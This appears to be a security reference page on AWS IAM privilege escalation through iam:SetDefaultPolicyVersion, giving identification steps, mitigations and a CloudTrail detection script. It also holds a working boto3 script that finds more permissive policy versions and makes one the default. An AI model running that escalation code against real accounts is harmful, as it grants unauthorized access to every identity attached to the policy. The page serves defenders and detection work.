AWS_CAN_SET_DEFAULT_POLICY_VERSION

Summary

FSProtect ACL Alias: AWS_CAN_SET_DEFAULT_POLICY_VERSION

Edge Type: Attack Path

Affected Object Types: IAM Users, IAM Roles, Customer Managed Policies

Exploitation Certainty: Certain

AWS IAM Action / Condition: iam:SetDefaultPolicyVersion on the target customer-managed policy ARN

Description

AWS_CAN_SET_DEFAULT_POLICY_VERSION represents the ability to change which version of a customer-managed IAM policy is the default, i.e. the one IAM actually evaluates. AWS managed policies are out of scope: their versions cannot be changed by the account.

This is a dangerous escalation primitive because IAM evaluates only the default version of a managed policy; the other stored versions are inert until one of them is made the default. If an attacker can set the default version, they can:

  • Re-activate an old privileged version that still exists.

  • Activate a malicious version created previously.

  • Escalate every identity attached to that policy, without modifying any attachment and without the attached principals needing new sessions.

This edge is commonly chained with AWS_CAN_CREATE_POLICY_VERSION. Two details matter for both the chain and its detection: a managed policy can hold at most five versions, so once that limit is reached an attacker who cannot delete versions is restricted to re-activating what already exists; and CreatePolicyVersion with --set-as-default activates the new version in the same call, so a SetDefaultPolicyVersion event with no preceding CreatePolicyVersion usually means a pre-existing version was re-activated.

Identification

AWS CLI

Check whether a principal can call iam:SetDefaultPolicyVersion on the target policy (the IAM policy simulator answers this for a given principal ARN, action and resource ARN):

List the policy's versions, identify the current default, and compare the document of each non-default version against it:

AWS Console

  • Open IAM -> Policies.

  • Select target customer-managed policy.

  • Open Policy versions and identify non-default versions.

  • Confirm which principals can create policy versions and switch the default.

Exploitation

AWS CLI

Set an existing version as default:

If version v3 includes broader permissions than the current default, all attached principals inherit those permissions as soon as the change propagates (normally within seconds); no attachment is modified, so the change is invisible to anyone reviewing only who is attached to what.
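The identification and exploitation steps above, as an added example that is not code from the original page or from the FSProtect project. It enumerates a customer-managed policy's versions, finds non-default versions whose Allow grants are a superset of the current default, checks with the IAM policy simulator that the caller may switch the default, and then switches it. The boto3 IAM calls used (list_policy_versions, get_policy_version, simulate_principal_policy, set_default_policy_version) exist with the keyword arguments shown, and the equivalent AWS CLI command is given beside each function. The FakeIam class stands in for boto3.client("iam") with constructed data so the script runs offline; the policy ARN, principal ARN and policy documents are placeholders.

```python
"""Identify re-activatable policy versions and switch the default (added example)."""

POLICY_ARN = "arn:aws:iam::123456789012:policy/app-deploy"   # placeholder
PRINCIPAL_ARN = "arn:aws:iam::123456789012:user/ci-bot"      # placeholder


def _allow_grants(document):
    """Flatten Allow statements to a set of (action, resource) pairs.
    Deny statements and Condition blocks are ignored, so 'broader' is a hint to
    inspect the version by hand, not a proof of strictly more access."""
    grants = set()
    for stmt in document.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions, resources = stmt.get("Action", []), stmt.get("Resource", [])
        actions = [actions] if isinstance(actions, str) else actions
        resources = [resources] if isinstance(resources, str) else resources
        grants.update((a, r) for a in actions for r in resources)
    return grants


# CLI: aws iam simulate-principal-policy --policy-source-arn <principal>
#          --action-names iam:SetDefaultPolicyVersion --resource-arns <policy>
def can_set_default(iam, principal_arn, policy_arn):
    resp = iam.simulate_principal_policy(
        PolicySourceArn=principal_arn,
        ActionNames=["iam:SetDefaultPolicyVersion"],
        ResourceArns=[policy_arn],
    )
    return all(r["EvalDecision"] == "allowed" for r in resp["EvaluationResults"])


# CLI: aws iam list-policy-versions --policy-arn <policy>
#      aws iam get-policy-version --policy-arn <policy> --version-id vN
def version_grants(iam, policy_arn):
    """Return (default_version_id, {version_id: grants}) for every stored version."""
    versions = iam.list_policy_versions(PolicyArn=policy_arn)["Versions"]
    default_id = next(v["VersionId"] for v in versions if v["IsDefaultVersion"])
    grants = {}
    for v in versions:
        doc = iam.get_policy_version(PolicyArn=policy_arn, VersionId=v["VersionId"])
        grants[v["VersionId"]] = _allow_grants(doc["PolicyVersion"]["Document"])
    return default_id, grants


def broader_versions(iam, policy_arn):
    """Version ids whose Allow grants are a strict superset of the default version's."""
    default_id, grants = version_grants(iam, policy_arn)
    base = grants[default_id]
    return sorted(vid for vid, g in grants.items() if vid != default_id and g > base)


# CLI: aws iam set-default-policy-version --policy-arn <policy> --version-id <id>
def activate(iam, policy_arn, version_id):
    """The escalation itself: one call, and every attached identity gets version_id's grants."""
    iam.set_default_policy_version(PolicyArn=policy_arn, VersionId=version_id)
    return version_id


class FakeIam:
    """Constructed stand-in for boto3.client('iam'): v1 is default, v3 is a superset of it."""
    def __init__(self):
        self.default = "v1"
        self.docs = {
            "v1": {"Statement": [{"Effect": "Allow", "Action": ["s3:GetObject"],
                                  "Resource": "arn:aws:s3:::app-bucket/*"}]},
            "v2": {"Statement": [{"Effect": "Allow", "Action": "ec2:DescribeInstances",
                                  "Resource": "*"}]},
            "v3": {"Statement": [{"Effect": "Allow", "Action": ["s3:GetObject", "iam:*"],
                                  "Resource": ["arn:aws:s3:::app-bucket/*", "*"]}]},
        }

    def list_policy_versions(self, PolicyArn):
        return {"Versions": [{"VersionId": v, "IsDefaultVersion": v == self.default}
                             for v in self.docs]}

    def get_policy_version(self, PolicyArn, VersionId):
        return {"PolicyVersion": {"VersionId": VersionId, "Document": self.docs[VersionId]}}

    def set_default_policy_version(self, PolicyArn, VersionId):
        self.default = VersionId
        return {}

    def simulate_principal_policy(self, PolicySourceArn, ActionNames, ResourceArns):
        # Constructed answer: the caller is allowed on POLICY_ARN and nothing else.
        return {"EvaluationResults": [
            {"EvalActionName": a, "EvalDecision": "allowed" if r == POLICY_ARN else "implicitDeny"}
            for a in ActionNames for r in ResourceArns]}


def run(iam=None, principal_arn=PRINCIPAL_ARN, policy_arn=POLICY_ARN):
    """Identification, then exploitation. Pass boto3.client('iam') to run against a real account."""
    iam = iam or FakeIam()
    targets = broader_versions(iam, policy_arn)
    allowed = can_set_default(iam, principal_arn, policy_arn)
    activated = activate(iam, policy_arn, targets[-1]) if targets and allowed else None
    default_after, _ = version_grants(iam, policy_arn)
    return {"broader": targets, "allowed": allowed, "activated": activated,
            "default_after": default_after}


if __name__ == "__main__":
    print(run())
```

With the constructed data, broader_versions reports only v3 (v2 grants something different, not more), the simulator allows the action on the target ARN, and run() ends with v3 as the default. The grant comparison deliberately treats policy documents as sets of (action, resource) pairs; it flags candidates, and the candidate's Deny statements and Conditions still have to be read before concluding it is really more permissive.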

Mitigation

  • Restrict iam:SetDefaultPolicyVersion (and iam:CreatePolicyVersion) to a minimal set of trusted identities, and scope the grant to specific policy ARNs: the action supports resource-level permissions, so a principal does not need it on every policy in the account.

  • Regularly delete old policy versions that are no longer required, so that no privileged version remains available to re-activate.

  • Enforce review/approval for policy version switching, ideally by routing all policy changes through a pipeline role rather than human principals.

  • Apply SCP guardrails (for example, denying iam:SetDefaultPolicyVersion and iam:CreatePolicyVersion to every principal except the designated pipeline roles) to prevent uncontrolled policy version activation.

Detection

Monitor CloudTrail for default version changes:

  • Event source: iam.amazonaws.com

  • Event name: SetDefaultPolicyVersion

Example lookup: filter CloudTrail LookupEvents on EventName = SetDefaultPolicyVersion, then read requestParameters.policyArn and requestParameters.versionId from each record to see which version was activated and by whom.

Correlate with CreatePolicyVersion events on the same policy ARN to detect full takeover chains. Treat a CreatePolicyVersion with setAsDefault = true as a single-step activation: it never produces a SetDefaultPolicyVersion event, so a rule that keys only on SetDefaultPolicyVersion misses it.
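The lookup and correlation just described, as an added detection example that is not code from the original page. The functions run over CloudTrail-shaped records and classify each version activation as a Create-then-SetDefault chain, a re-activation of an existing version, or a CreatePolicyVersion that activated itself via setAsDefault. Real records can be pulled with `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=SetDefaultPolicyVersion` (each returned event carries the raw record as a JSON string in its CloudTrailEvent field) or read from a CloudTrail S3, Athena or SIEM export. SAMPLE_RECORDS is constructed; the account id, ARNs, user names and timestamps are placeholders, and the records carry only the fields the detection needs.

```python
"""Flag and correlate IAM policy version activations in CloudTrail (added example)."""
from datetime import datetime, timedelta


def _rec(time, actor, name, **params):
    """Build a minimal CloudTrail-shaped IAM record (constructed test data)."""
    return {"eventTime": time, "eventSource": "iam.amazonaws.com", "eventName": name,
            "userIdentity": {"arn": f"arn:aws:iam::123456789012:user/{actor}"},
            "requestParameters": params}


APP = "arn:aws:iam::123456789012:policy/app-deploy"     # placeholder
OPS = "arn:aws:iam::123456789012:policy/ops-readonly"   # placeholder

# Constructed sample: a chained takeover, a lone re-activation, a self-activating create, noise.
SAMPLE_RECORDS = [
    _rec("2024-05-01T10:00:00Z", "alice", "CreatePolicyVersion", policyArn=APP, setAsDefault=False),
    _rec("2024-05-01T10:04:00Z", "alice", "SetDefaultPolicyVersion", policyArn=APP, versionId="v3"),
    _rec("2024-05-01T13:30:00Z", "bob", "SetDefaultPolicyVersion", policyArn=OPS, versionId="v2"),
    _rec("2024-05-01T15:00:00Z", "carol", "CreatePolicyVersion", policyArn=OPS, setAsDefault=True),
    {"eventTime": "2024-05-01T15:01:00Z", "eventSource": "s3.amazonaws.com", "eventName": "GetObject",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dave"}, "requestParameters": {}},
]


def _when(record):
    return datetime.strptime(record["eventTime"], "%Y-%m-%dT%H:%M:%SZ")


def default_version_changes(records):
    """The basic rule from the page: every SetDefaultPolicyVersion call from iam.amazonaws.com."""
    return [r for r in records
            if r["eventSource"] == "iam.amazonaws.com"
            and r["eventName"] == "SetDefaultPolicyVersion"]


def takeover_findings(records, window=timedelta(hours=1)):
    """Classify each activation of a policy version:
      create-then-activate: CreatePolicyVersion on the same policy ARN within `window`
                            before SetDefaultPolicyVersion (the chained edge)
      reactivate-existing:  SetDefaultPolicyVersion with no recent CreatePolicyVersion,
                            i.e. an already-stored version was brought back
      create-and-activate:  CreatePolicyVersion with setAsDefault=true, which activates
                            the new version without any SetDefaultPolicyVersion event"""
    iam = sorted((r for r in records if r["eventSource"] == "iam.amazonaws.com"), key=_when)
    creates = [r for r in iam if r["eventName"] == "CreatePolicyVersion"]
    findings = []
    for r in iam:
        p = r.get("requestParameters") or {}
        actor = r["userIdentity"]["arn"]
        if r["eventName"] == "CreatePolicyVersion" and p.get("setAsDefault"):
            findings.append({"type": "create-and-activate", "policyArn": p["policyArn"],
                             "actor": actor, "versionId": None, "time": r["eventTime"]})
        elif r["eventName"] == "SetDefaultPolicyVersion":
            prior = [c for c in creates
                     if c["requestParameters"]["policyArn"] == p["policyArn"]
                     and timedelta(0) <= _when(r) - _when(c) <= window]
            findings.append({
                "type": "create-then-activate" if prior else "reactivate-existing",
                "policyArn": p["policyArn"], "actor": actor,
                "versionId": p.get("versionId"), "time": r["eventTime"],
                "created_by": sorted({c["userIdentity"]["arn"] for c in prior}),
            })
    return findings


if __name__ == "__main__":
    for f in takeover_findings(SAMPLE_RECORDS):
        print(f["time"], f["type"], f["policyArn"], f["actor"], f["versionId"])
```

Each finding carries the policy ARN and version id so the responder can immediately pull that version's document and compare it with the one that was previously active. The window is a tuning knob: a short one separates an attacker's rapid create-and-switch from a change-managed rollout, while a lone re-activation with no create at all is exactly the case the page's mitigation about deleting old versions is meant to remove.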
